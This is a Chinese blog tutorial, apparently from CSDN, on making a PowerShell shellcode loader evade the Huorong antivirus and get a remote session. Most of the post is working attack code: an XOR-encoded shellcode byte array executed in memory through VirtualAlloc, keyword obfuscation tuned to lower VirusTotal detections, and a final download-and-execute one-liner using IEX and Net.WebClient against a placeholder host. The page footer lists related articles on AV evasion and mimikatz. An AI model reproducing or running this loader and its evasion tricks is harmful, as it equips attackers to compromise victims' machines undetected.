Powershell 过火绒免杀上线

已于 2023-06-29 21:23:58 修改
阅读量5.2k 收藏 12
点赞数
分类专栏: 免杀 文章标签: 免杀
于 2021-01-10 17:06:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/112431490
版权

payload生成

在这里插入图片描述
在这里插入图片描述
原生payload生成后被无情秒杀

powershell免杀制作

打开powershell命令行,将payload编码

1.新建一个变量h,用来接收之后编码的payload

$h= ''

2.把FromBase64String放入变量$k中

$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjIsajcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQsabgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2sacVvXE0uTZza6YyXLzIx9Qoif5Po3wt1ysaEcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')

3.利用循环每次加个’,',并且把编码后的数据转换成一行

$k | foreach {$h=$h+$_.ToString()+','}

4.输出编码后的payload

$h

在这里插入图片描述
整合为ps1脚本更方便

$h= ''
$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktzKCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQBCEOnRtGWA9JPbgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI35TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2LT1KZD3+zcVvXE0uTZza6YyXLzIx9Qoif5Po3wt1y9hGg6LydpPI6DLJC9REcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')
$k | foreach {$h=$h+$_.ToString()+','}
$h

在这里插入图片描述

然后将编码得到的数据复制替换payload即可,注意去掉最后一个逗号”,“。

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,98,118,80,112,35,208,4,33,14,157,27,70,88,15,73,61,184,47,138,235,121,168,75,112,158,162,204,212,255,214,74,102,24,228,214,126,49,174,152,227,236,42,203,172,124,66,80,122,144,5,235,149,92,93,192,206,242,231,244,18,147,221,229,76,18,172,50,227,153,4,192,1,194,144,7,23,166,47,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

火绒免杀
在这里插入图片描述
VT检查杀率(60/13),还需要继续改造
在这里插入图片描述
修改关键字,规避静态特征查杀,时间问题只修改了小部分

IEX $DoIt -- i`ex $DoIt
IEX $a  --  ie`x $a
$var_runme -- $vrunme
$var_buffer -- $vbuffer
func_get_proc_address --  func_k
func_get_delegate_type -- func_l
$var_type_builder -- $vk
$var_parameters -- $vp
$var_return_type-- $ve
$var_procedure -- $v_pro

建议使用工具直接替换
在这里插入图片描述

到这里,查杀率60/5,还需要再改改
在这里插入图片描述

最终payload

Set-StrictMode -Version 2

$DoIt = @'
function func_k {
	Param ($var_module, $v_pro)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Mic'+'rosoft.Win32.Unsa'+'feNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetPro'+'cAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetM'+'oduleH'+'andle')).Invoke($null, @($var_module)))), $v_pro))
}

function func_l {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $vp,
		[Parameter(Position = 1)] [Type] $ve = [Void]
	)

	$vk = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Refle'+'ctedDele'+'gate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'oryModule', $false).DefineType('MyDelega'+'teType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$vk.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $vp).SetImplementationFlags('Runtime, Managed')
	$vk.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $ve, $vp).SetImplementationFlags('Runtime, Managed')

	return $vk.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,115,40,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_k kernel32.dll VirtualAlloc), (func_l @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$vbuffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $vbuffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vbuffer, (func_l @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	i`ex $DoIt
}

在这里插入图片描述

然后使用powershell远程下载并通过IEX运行脚本得到会话权限

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xxx.com/x.ps1'')'.Replace('11','adString');IEX ($a+$b)"

或者手动执行

c:\windows\system32\xx>d:
d:\>cd D:\wwwroot\xx\xxFile
D:\wwwroot\xx\xxFile>powershell -ExecutionPolicy bypass -File ./x.ps1

在这里插入图片描述

内容浅显,没什么技术含量,不足之处欢迎师傅们指点和纠正,感激不尽。

春日野穹ㅤ
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简单免杀火绒、360极速版
摔不死的笨鸟的博客
03-03 1828
免杀
mimikatz免杀过360和火绒
qq_44905657的博客
12-28 2080
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
免杀火绒
sash1mi
02-04 2312
免杀火绒 接上篇文章《免杀过360全家桶》 https://blog.csdn.net/weixin_46676743/article/details/113350500 1.cs建立监听 2.生成payload 3.将生成的payload放到kali里编译 4.FourEye编译 项目地址与具体使用方法: https://github.com/lengjibo/FourEye 注意:一定要按照此工具的编译规则install gcc!! 5.火绒查杀 360查杀 6.cs上线 .
针对cs生成powershell木马免杀火绒
最新发布
WenHeMian_的博客
06-02 376
第二种,Win-PS2EXE,对于ps2exe是打包python专门给win使用的,在其他篇章中会用此来打包python的免杀脚本。心跳0s, byassUac提权成功,但是要谨慎提权!对于函数名和变量名进行混淆,不要用原始名,因为都被人用烂了,360云脑,windows df直接杀。第一种Lodan,玩内网的肯定都很熟悉,这东西其实在cs插件Lodan的目录里面就有LodanGUI。注意我这里是x64的木马,与x86不同的就是代码结构,免杀手法相同。火绒这个东西,只要一开始不报毒,那以后基本很难被杀了。
第六章-10 使用powershell进行免杀
划水的小白白
11-27 601
零、说明 1.说明 本文所有内容仅仅用于信息安全方面技术交流, 请读者切勿用于其他用途!!! 一、 生成power shell 1.1创建监听 我这里创建一个监听,命名为bypass。 1.2生成payload 二、Psimage脚本 2.1原理 简单说,将刚刚生成的代码放到图片里。有点类似图片马。 而且图片几乎不会受到什么影响。 2.2图片格式的选择 注意的是,最好图片选择png格式。为什么? 因为将payload存储到这种格式,可以进行无损压缩,且不会影响payload的执行。 但
红队攻防之powershell上线基础免杀(一)
自强不息
02-25 570
不努力,你背井离乡干嘛?当卧底啊
免杀Bypass!可过WDF/360/火绒的C#混淆器
潇湘信安的博客
04-10 631
一个可用于免杀过WDF/360/火绒的C#混淆器,但只能混淆.Net Framework应用程序。
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
Powershell
03-20
PowerShell是一种强大的命令行接口和脚本语言,由微软开发,专为系统管理员和开发者设计。它基于.NET Framework,提供了一种更为现代化、面向对象的方式来管理Windows操作系统和应用程序。相较于传统的命令提示符...
powershell:PowerShell 脚本
06-29
PowerShell是一种强大的命令行接口和脚本语言,主要用于自动化Windows操作系统的管理任务。它由微软开发,旨在替代传统的命令提示符(CMD),提供更丰富的功能和更强的控制能力。PowerShell基于.NET框架,使得开发者...
powershell_credentials
06-24
标题中的“powershell_credentials”可能指的是一个PowerShell脚本,用于处理凭据管理或安全相关的任务。在PowerShell中,管理用户凭据是常见的需求,特别是在自动化任务、远程访问或者执行需要管理员权限的操作时。...
Powershell 免杀过 defender 火绒,附自动化工具
st3pby的博客
02-20 4422
技术交流 关注微信公众号Z20安全团队, 回复加群,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 powershell执行策略修改 1 获取 PowerShell当前执行策略 Get-ExecutionPolicy windows默认配置为Restricted 2 设置执行策略 Set-ExecutionPolicy unrestricted PowerShell通过对安全做过充分考量...
使用msfvenom免杀火绒
2301_76718200的博客
11-11 871
本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win。2、再使用msfvenom生成一个捆绑可以被windows执行的exe木马文件。3、把刚刚生成的exe木马文件传输到我们的win11物理机上。1、首先到火绒官网上下载个火绒安装包后放到kali中。#修改成我们之前生成木马时使用的payload。前提把杀软关闭要不然会杀掉,没有做免杀的木马。靶机,启动火绒点击我们编译过的木马程序。点击后就连接上我们的kali攻击机了。#设置kali的IP地址为监听地址。
PowerShell命令免杀思路
qq_44657899的博客
11-08 1493
文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳 前言 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序(例如:sh、bash 或 csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过,内存中
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 2224
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
vulntarget-b 免杀火绒,多层域控内网靶场
weixin_68408599的博客
12-31 1196
靶场环境:项目地址:涉及知识点:极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278kali攻击机 ip:192.168.127.129。
vb6.0的各种SHELL,CMD内部命令、外部命令、SHELL任意文件
weixin_30532369的博客
10-13 989
1 Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirec...
Webshell 及检测绕过
m0_57798134的博客
08-17 549
webshell 概念。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值